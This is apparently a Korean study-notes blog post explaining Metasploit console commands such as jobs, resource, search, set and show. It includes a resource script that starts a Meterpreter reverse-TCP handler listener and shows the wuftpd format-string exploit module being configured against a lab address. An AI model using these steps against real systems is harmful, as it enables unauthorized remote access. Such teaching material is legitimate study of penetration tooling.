본문 바로가기

Learning/└◆Metasploit

metasploit 03 명령어 및 사용법_2

 

■ color 명령어

msf > help color

color <'true' |'false' |'auto'>

false 색 표시 X

auto 색 표시 O

msf > color false

msf > banner

msf > color auto

msf > banner

 

■ edit 명령어

msf > help edit

편집 할 때 사용

msf > use auxiliary/scanner/rservices/rlogin_login

msf auxiliary(rlogin_login) > edit

##

#

#.....코드를 확인할 수 있는 편집기

내용을 확인할 수 있다.

:q!

msf auxiliary(rlogin_login) > back

msf >

 

■ info 명령어

msf > help info

msf > search rlogin

msf > info auxiliary/scnner/rservices/rlogin_login

....rlogin프로그램에 대한 내용 출력

msf > use auxiliary/scanner/rservices/rlogin_login

msf auxiliary(rlogin_login) > info

모드를 선택한 상태에서 info 를 치면 선택되어 있는 모드에 대한 정보가 출력된다. 

msf auxiliary(rlogin_login) > back

msf >

 

■ irb 명령어

msf > help irb

msf > irb

...

>> puts "hello, metasploit!" <-- put : 출력명령어 (bash shell 의 echo와 같음)

hello, metasploit!

-> nil

>> Framework::Version

-> "4.11 .5-2016010401"

>> quit

msf >

루비 언어로 만들어져 있어서 관련 쉘(irb)을 사용 할 수 있다.

 

■ jobs 명령어

msf > help jobs

...

msf > resource /root/bin/reverse_resource.rc    msfconsole -r reverse_resource.rc

/root/bin/reverse_resource.rc 생성

# mkdir -p /root/bin

# cd /root/bin

# vi reverse_resource.rc

use exploit/mulit/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.20.50

set ExitSession false

exploit -j -z

미리 만들어 놓은 파일

 

msf exploit(handler) > ...

<ENTER>

msf exploit(handler) > jobs

백그라운드 작업 확인

jobs

==

id    name                       payload        LPORT

0    exploit: multi/handler    windows...    4444

 

msf exploit(handler) > back

msf >

 

OPTIONS

-K 모든 백그라운드를 해제 할 수 있다. 

 

■ kill 명령어

msf > help kill

msf > jobs

...

msf > kill 0

msf > jobs

없다.

 

■ resource 명령어

msf > help resource

msf > resource /root/bin/reverse_resource.rc

미리 만들어 있는 파일

msf exploit(handler) > exit

# echo version > version.rc

# msfconsole -q -r version.rc

 

 

■ route 명령어

msf > help route

....

EX) meterpreter > route

 

■ search 명령어**

msf > help search

Keywords:

app : Modules that are client or server attacks

author : Modules written by this author

bid : Modules with a matching Bugtraq ID

cve : Modules with a matching CVE ID

edb : Modules with a matching Exploit-DB ID

name : Modules with a matching descriptive name

osvdb : Modules with a matching OSVDB ID

platform : Modules affecting this platform

ref : Modules with a matching ref

type : Modules of a specific type (exploit, auxiliary, or post)

 

Examples:

msf > search usermap_script

msf > search name:mysql

msf > search platform:aix

msf >search type:post

 

■ sessions 명령어

msf > help sessions



■ set/unset 명령어

변수 설정    <변수이름 값>

msf > help set

msf > help unset


msf > search wuftpd

....

msf > use exploit/mulit/ftp/wuftpd_site_exec_format


설정 확인

msf exploit(wuftpd_site_exec_format) > show options


설정 등록

msf exploit(wuftpd_site_exec_format) > set RHOST 192.168.10.134

msf exploit(wuftpd_site_exec_format) > set FTPPASS jang4sc@hanmail.net

msf exploit(wuftpd_site_exec_format) > show options 


설정 제거

msf exploit(wuftpd_site_exec_format) > unset RHOST

msf exploit(wuftpd_site_exec_format) > show options


모두 제거

msf exploit(wuftpd_site_exec_format) > unset all


msf exploit(wuftpd_site_exec_format) > set

-----------------------------------------------

Global

=====

No entries in data store. 데이터 스토어 에는 다 지워져서 없다. 


Module: multi/ftp/wuftpd_site_exec_format

name            value

........                ........


-----------------------------------------------

msf exploit(wuftpd_site_exec_format) > back

msf >


■ show 명령어

msf > help show

msf > show all

msf > show encoders

msf > show exploits

msf > show payloads

msf > show auxiliary

msf > show options 

msf > use exploit/multi/ftp/wuftpd_site_exec_format

msf exploit(wuftpd_site_exec_format) > show options

.....옵션 출력 

msf exploit(wuftpd_site_exec_format) > show targets

....

msf exploit(wuftpd_site_exec_format) > show advance

....

msf exploit(wuftpd_site_exec_format) > set